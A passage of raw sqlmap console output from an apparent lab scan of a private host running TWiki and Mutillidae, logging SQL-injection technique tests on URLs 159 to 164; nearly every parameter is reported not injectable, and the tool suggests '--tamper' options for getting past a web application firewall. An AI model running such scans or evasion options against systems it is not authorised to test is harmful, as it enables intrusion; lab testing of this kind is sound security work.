[20:02:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:02:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:02:12] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:02:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:02:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:02:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:02:14] [INFO] testing 'Oracle AND time-based blind'
[20:02:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:02:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:02:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:02:27] [WARNING] GET parameter 'rev1' is not injectable
[20:02:27] [INFO] testing if GET parameter 'rev2' is dynamic
[20:02:27] [INFO] confirming that GET parameter 'rev2' is dynamic
[20:02:27] [INFO] GET parameter 'rev2' is dynamic
[20:02:27] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[20:02:27] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks
[20:02:27] [INFO] testing for SQL injection on GET parameter 'rev2'
[20:02:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:02:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:02:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:02:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:02:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:02:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:02:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:02:33] [INFO] testing 'MySQL inline queries'
[20:02:33] [INFO] testing 'PostgreSQL inline queries'
[20:02:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:02:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:02:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:02:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:02:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:02:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:02:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:02:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:02:38] [INFO] testing 'Oracle AND time-based blind'
[20:02:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:02:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:02:51] [WARNING] GET parameter 'rev2' is not injectable
[20:02:51] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 159:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?rev=1.16
do you want to test this URL? [Y/n/q]
> Y
[20:02:51] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?rev=1.16'
[20:02:51] [INFO] testing connection to the target URL
[20:02:52] [INFO] testing if the target URL is stable
[20:02:53] [INFO] target URL is stable
[20:02:53] [INFO] testing if GET parameter 'rev' is dynamic
[20:02:53] [WARNING] GET parameter 'rev' does not appear dynamic
[20:02:53] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[20:02:53] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[20:02:53] [INFO] testing for SQL injection on GET parameter 'rev'
[20:02:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:02:53] [WARNING] reflective value(s) found and filtering out
[20:02:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:02:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:02:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:02:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:02:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:02:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:02:57] [INFO] testing 'MySQL inline queries'
[20:02:57] [INFO] testing 'PostgreSQL inline queries'
[20:02:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:02:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:02:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:02:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:02:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:02:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:03:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:03:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:03:01] [INFO] testing 'Oracle AND time-based blind'
[20:03:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:03:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:03:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:03:16] [WARNING] GET parameter 'rev' is not injectable
[20:03:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[20:03:16] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiForms?rev1=1.16&rev2=1.15'
[20:03:16] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiForms?rev=1.15'
URL 160:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiForms?template=oopsmore&param1=1.17&param2=1.17
do you want to test this URL? [Y/n/q]
> Y
[20:03:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiForms?template=oopsmore&param1=1.17&param2=1.17'
[20:03:16] [INFO] testing connection to the target URL
[20:03:16] [INFO] testing if the target URL is stable
[20:03:17] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[20:03:17] [INFO] testing if GET parameter 'template' is dynamic
[20:03:17] [INFO] confirming that GET parameter 'template' is dynamic
[20:03:17] [INFO] GET parameter 'template' is dynamic
[20:03:17] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[20:03:17] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[20:03:17] [INFO] testing for SQL injection on GET parameter 'template'
[20:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:03:17] [INFO] heuristics detected web page charset 'ascii'
[20:03:17] [WARNING] reflective value(s) found and filtering out
[20:03:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:03:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:03:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:03:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:03:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:03:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:03:20] [INFO] testing 'MySQL inline queries'
[20:03:20] [INFO] testing 'PostgreSQL inline queries'
[20:03:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:03:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:03:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:03:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:03:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:03:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:03:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:03:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:03:23] [INFO] testing 'Oracle AND time-based blind'
[20:03:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:03:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:03:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:03:33] [WARNING] GET parameter 'template' is not injectable
[20:03:33] [INFO] testing if GET parameter 'param1' is dynamic
[20:03:33] [WARNING] GET parameter 'param1' does not appear dynamic
[20:03:33] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[20:03:33] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[20:03:33] [INFO] testing for SQL injection on GET parameter 'param1'
[20:03:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:03:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:03:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:03:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:03:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:03:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:03:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:03:38] [INFO] testing 'MySQL inline queries'
[20:03:38] [INFO] testing 'PostgreSQL inline queries'
[20:03:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:03:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:03:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:03:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:03:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:03:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:03:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:03:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:03:42] [INFO] testing 'Oracle AND time-based blind'
[20:03:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:03:49] [INFO] target URL appears to be UNION injectable with 10 columns
[20:03:49] [WARNING] applying generic concatenation with double pipes ('||')
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:03:53] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[20:03:54] [INFO] testing 'MySQL UNION query (88) - 1 to 10 columns'
[20:04:02] [WARNING] GET parameter 'param1' is not injectable
[20:04:02] [INFO] testing if GET parameter 'param2' is dynamic
[20:04:02] [WARNING] GET parameter 'param2' does not appear dynamic
[20:04:02] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[20:04:02] [INFO] testing for SQL injection on GET parameter 'param2'
[20:04:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:04:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:04:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:04:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:04:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:04:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:04:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:04:07] [INFO] testing 'MySQL inline queries'
[20:04:07] [INFO] testing 'PostgreSQL inline queries'
[20:04:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:04:07] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:04:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:04:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:04:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:04:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:04:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:04:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:04:11] [INFO] testing 'Oracle AND time-based blind'
[20:04:11] [INFO] testing 'Generic UNION query (88) - 1 to 10 columns'
[20:04:19] [INFO] testing 'MySQL UNION query (88) - 1 to 10 columns'
[20:04:27] [WARNING] GET parameter 'param2' is not injectable
[20:04:27] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 161:
GET http://192.168.1.113:80/twiki/bin/rename/TWiki/TWikiForms?newweb=TWiki&newtopic=TWikiFormTemplate&confirm=on
do you want to test this URL? [Y/n/q]
> Y
[20:04:27] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rename/TWiki/TWikiForms?newweb=TWiki&newtopic=TWikiFormTemplate&confirm=on'
[20:04:27] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://192.168.1.113/twiki/bin/oops/TWiki/TWikiFormTemplate'. Do you want to follow? [Y/n] Y
[20:04:27] [INFO] testing if the target URL is stable
[20:04:28] [WARNING] GET parameter 'newweb' does not appear dynamic
[20:04:28] [INFO] heuristics detected web page charset 'ascii'
[20:04:28] [WARNING] heuristic (basic) test shows that GET parameter 'newweb' might not be injectable
[20:04:28] [INFO] testing for SQL injection on GET parameter 'newweb'
[20:04:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:04:28] [WARNING] reflective value(s) found and filtering out
[20:04:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:04:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:04:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:04:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:04:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:04:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:04:33] [INFO] testing 'MySQL inline queries'
[20:04:34] [INFO] testing 'PostgreSQL inline queries'
[20:04:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:04:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:04:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:04:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:04:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:04:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:04:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:04:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:04:39] [INFO] testing 'Oracle AND time-based blind'
[20:04:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:04:40] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:04:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:04:56] [WARNING] GET parameter 'newweb' is not injectable
[20:04:56] [WARNING] GET parameter 'newtopic' does not appear dynamic
[20:04:56] [WARNING] heuristic (basic) test shows that GET parameter 'newtopic' might not be injectable
[20:04:56] [INFO] testing for SQL injection on GET parameter 'newtopic'
[20:04:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:04:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:04:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:05:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:05:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:05:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:05:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:05:03] [INFO] testing 'MySQL inline queries'
[20:05:03] [INFO] testing 'PostgreSQL inline queries'
[20:05:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:05:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:05:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:05:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:05:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:05:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:05:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:05:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:05:10] [INFO] testing 'Oracle AND time-based blind'
[20:05:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:05:13] [INFO] target URL appears to be UNION injectable with 10 columns
[20:05:13] [WARNING] applying generic concatenation with double pipes ('||')
[20:05:14] [INFO] GET parameter 'newtopic' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[20:05:14] [INFO] checking if the injection point on GET parameter 'newtopic' is a false positive
[20:05:14] [WARNING] false positive or unexploitable injection point detected
[20:05:14] [WARNING] GET parameter 'newtopic' is not injectable
[20:05:14] [WARNING] GET parameter 'confirm' does not appear dynamic
[20:05:14] [WARNING] heuristic (basic) test shows that GET parameter 'confirm' might not be injectable
[20:05:14] [INFO] testing for SQL injection on GET parameter 'confirm'
[20:05:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:05:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:05:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:05:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:05:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:05:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:05:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:05:20] [INFO] testing 'MySQL inline queries'
[20:05:20] [INFO] testing 'PostgreSQL inline queries'
[20:05:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:05:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:05:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:05:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:05:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:05:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:05:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:05:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:05:26] [INFO] testing 'Oracle AND time-based blind'
[20:05:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:05:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:05:47] [WARNING] GET parameter 'confirm' is not injectable
[20:05:47] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[20:05:47] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=login.php'
URL 162:
GET http://192.168.1.113:80/twiki/bin/edit/Know/WebPreferences?t=1441457596
do you want to test this URL? [Y/n/q]
> Y
[20:05:47] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Know/WebPreferences?t=1441457596'
[20:05:47] [INFO] testing connection to the target URL
[20:05:47] [INFO] testing if the target URL is stable
[20:05:48] [INFO] target URL is stable
[20:05:48] [INFO] testing if GET parameter 't' is dynamic
[20:05:48] [WARNING] GET parameter 't' does not appear dynamic
[20:05:48] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[20:05:48] [INFO] testing for SQL injection on GET parameter 't'
[20:05:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:05:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:05:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:05:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:05:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:05:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:05:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:05:51] [INFO] testing 'MySQL inline queries'
[20:05:51] [INFO] testing 'PostgreSQL inline queries'
[20:05:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:05:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:05:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:05:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:05:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:05:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:05:54] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:05:54] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:05:55] [INFO] testing 'Oracle AND time-based blind'
[20:05:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:05:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:06:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:06:07] [WARNING] GET parameter 't' is not injectable
[20:06:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 163:
GET http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text&regex=on&search=Web *Preferences[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[20:06:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text&regex=on&search=Web *Preferences[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[20:06:07] [INFO] testing connection to the target URL
[20:06:08] [INFO] testing if the target URL is stable
[20:06:08] [INFO] target URL is stable
[20:06:08] [INFO] testing if URI parameter '#1*' is dynamic
[20:06:09] [INFO] confirming that URI parameter '#1*' is dynamic
[20:06:09] [INFO] URI parameter '#1*' is dynamic
[20:06:09] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:06:09] [INFO] testing for SQL injection on URI parameter '#1*'
[20:06:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:06:09] [WARNING] reflective value(s) found and filtering out
[20:06:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:06:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:06:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:06:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:06:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:06:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:06:12] [INFO] testing 'MySQL inline queries'
[20:06:13] [INFO] testing 'PostgreSQL inline queries'
[20:06:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:06:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:06:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:06:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:06:14] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:06:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:06:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:06:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:06:16] [INFO] testing 'Oracle AND time-based blind'
[20:06:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:06:16] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:06:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:06:27] [WARNING] URI parameter '#1*' is not injectable
[20:06:27] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 164:
GET http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?skin=print
do you want to test this URL? [Y/n/q]
> Y
[20:06:27] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?skin=print'
[20:06:27] [INFO] testing connection to the target URL
[20:06:27] [INFO] testing if the target URL is stable
[20:06:28] [INFO] target URL is stable
[20:06:28] [INFO] testing if GET parameter 'skin' is dynamic
[20:06:28] [INFO] confirming that GET parameter 'skin' is dynamic
[20:06:29] [INFO] GET parameter 'skin' is dynamic
[20:06:29] [INFO] heuristics detected web page charset 'ascii'
[20:06:29] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[20:06:29] [INFO] testing for SQL injection on GET parameter 'skin'
[20:06:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:06:29] [WARNING] reflective value(s) found and filtering out
[20:06:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:06:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:06:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:06:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:06:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:06:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:06:32] [INFO] testing 'MySQL inline queries'
[20:06:32] [INFO] testing 'PostgreSQL inline queries'
[20:06:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:06:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:06:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:06:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:06:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:06:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:06:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:06:35] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:06:36] [INFO] testing 'Oracle AND time-based blind'
[20:06:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:06:36] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:06:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:06:48] [WARNING] GET parameter 'skin' is not injectable
